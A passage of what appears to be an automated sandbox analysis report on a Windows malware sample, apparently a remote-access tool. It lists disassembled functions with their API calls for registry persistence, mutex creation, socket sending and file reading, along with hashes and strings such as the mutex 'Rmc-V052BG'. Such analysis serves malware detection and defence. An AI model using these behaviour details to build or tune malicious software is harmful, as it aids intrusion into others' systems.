                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                    • API String ID: 1818849710-4028850238
                                                                                                                                                                    • Opcode ID: 944061157b2f8cf5ce0fe9502f04d7932ff2a7d7d8f180209318ac9fb18fc527
                                                                                                                                                                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                                                                                                                    • Opcode Fuzzy Hash: 944061157b2f8cf5ce0fe9502f04d7932ff2a7d7d8f180209318ac9fb18fc527
                                                                                                                                                                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2579639479-0
                                                                                                                                                                    • Opcode ID: a856dfcc4fb5ec99c523120432dd4ff1f07683bf8a99cd0950dd96342101e422
                                                                                                                                                                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                                                                                                                    • Opcode Fuzzy Hash: a856dfcc4fb5ec99c523120432dd4ff1f07683bf8a99cd0950dd96342101e422
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C4E5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2135649906-0
                                                                                                                                                                    • Opcode ID: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                                                                                                                                                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                                                                                                                    • Opcode Fuzzy Hash: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040D083
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                    • String ID: Rmc-V052BG
                                                                                                                                                                    • API String ID: 1925916568-2991731777
                                                                                                                                                                    • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                                                                                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                                                                                                                    • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                                                                                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EventObjectSingleWaitsend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3963590051-0
                                                                                                                                                                    • Opcode ID: a1ff3687248209f9743c60f565233b4765f32d228741c77e03e4de178fa39ade
                                                                                                                                                                    • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                                                                                                                                    • Opcode Fuzzy Hash: a1ff3687248209f9743c60f565233b4765f32d228741c77e03e4de178fa39ade
                                                                                                                                                                    • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                    • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                                                                                                                    • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                                                                                                                    • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                    • Opcode ID: b53d5430339f24b3f35949c1b6b46cee90247795c41e72649518dd5831c8e0a8
                                                                                                                                                                    • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                                                                                                                                    • Opcode Fuzzy Hash: b53d5430339f24b3f35949c1b6b46cee90247795c41e72649518dd5831c8e0a8
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044F3DD Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                                                                                                                                                    • _free.LIBCMT ref: 0044F41A
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2716640707-0
                                                                                                                                                                    • Opcode ID: 8c830847f627c56b18221293452c170e3b7caa4654d8c11f7beef3e49baffa3a
                                                                                                                                                                    • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                                                                                                                                                                    • Opcode Fuzzy Hash: 8c830847f627c56b18221293452c170e3b7caa4654d8c11f7beef3e49baffa3a
                                                                                                                                                                    • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 00413592
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                    • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                    • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                    • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                    • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                    • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                                                                                                                                    • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                    • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                                                                    • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                                                                                                    • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1818849710-0
                                                                                                                                                                    • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                    • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                    • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                    • String ID: pQG
                                                                                                                                                                    • API String ID: 176396367-3769108836
                                                                                                                                                                    • Opcode ID: c50c2063860dd9f07635b7b10a5bf04525f51203df799d6542eaf58ab7b4cd2f
                                                                                                                                                                    • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                                                                                                                                    • Opcode Fuzzy Hash: c50c2063860dd9f07635b7b10a5bf04525f51203df799d6542eaf58ab7b4cd2f
                                                                                                                                                                    • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 1890195054-2766056989
                                                                                                                                                                    • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                    • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                    • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00446185 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 004461A6
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap$_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1482568997-0
                                                                                                                                                                    • Opcode ID: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                                                                                                                                                                    • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                                                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateEventStartupsocket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1953588214-0
                                                                                                                                                                    • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                                                                                                                    • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                                                                                                                    • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                                                                                                                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                                                                                                                    • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                                                                                                                    Uniqueness

